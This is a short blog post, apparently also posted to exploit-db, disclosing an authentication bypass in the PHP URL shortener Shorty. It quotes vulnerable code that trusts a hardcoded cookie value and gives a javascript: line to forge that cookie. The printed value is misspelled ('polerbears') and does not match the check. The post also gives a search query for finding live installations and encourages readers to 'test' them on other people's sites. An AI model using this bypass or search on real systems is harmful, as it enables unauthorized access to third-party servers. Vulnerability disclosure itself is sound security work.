Shorty Authentication Bypass

(This post was posted originally at my personal own blog and also featured in the exploit-db.com website)

Today, reading some stuff at internet I have found an article about 7 PHP scripts to generate shorts URLs. This kind of links are very common today with a lot of controversy about the security risk that they implied. I’m not here (now) to discuss about shorting URL’s services but to talk about a stupid bug that I have found in the first (!!!) software that WebResourcesDepot recommend today.

Shorty is a script very old… From 2006. Why are they recommending it in the first place? Second: Did they try to install it? A lot of errors appears when you try a fresh install and some pain until you can fix it. Buggy from the scratch.

I then decided to read some source code. I have found that in functions.php is some bug that we can use to bypass the login form. Let's go to read some php code:

function authenticate(){
    $cookie = @$_COOKIE['snickerdoodle'];
    if($cookie == "polarbears"){
        //
    } else {
        exit("Not logged in.");
    }
}

function verify(){
    if(@$_COOKIE['snickerdoodle']){
        $cookie = $_COOKIE['snickerdoodle'];
    } else {
        $cookie = '';
    }
    if($cookie == "polarbears"){
        return 1;
    } else {
        return 0;
    }
}

As you can read this code generates a cookie with the name “snickerdoodle” and the value “polarbears” to determine if you are authenticated or not. Its very easy to create a new cookie into your browser with this data with some Firefox extension. If you are using a browser without extensions like Google Chrome you can try to write the next javascript sentence into your URL:

javascript:document.cookie=”snickerdoodle=polerbears”;

If you don’t want to install Shorty (and mess around with all the hacks you have to do use it) you can always use the search intitle:”Shorty (Beta)” to found some places to test it.

Have fun!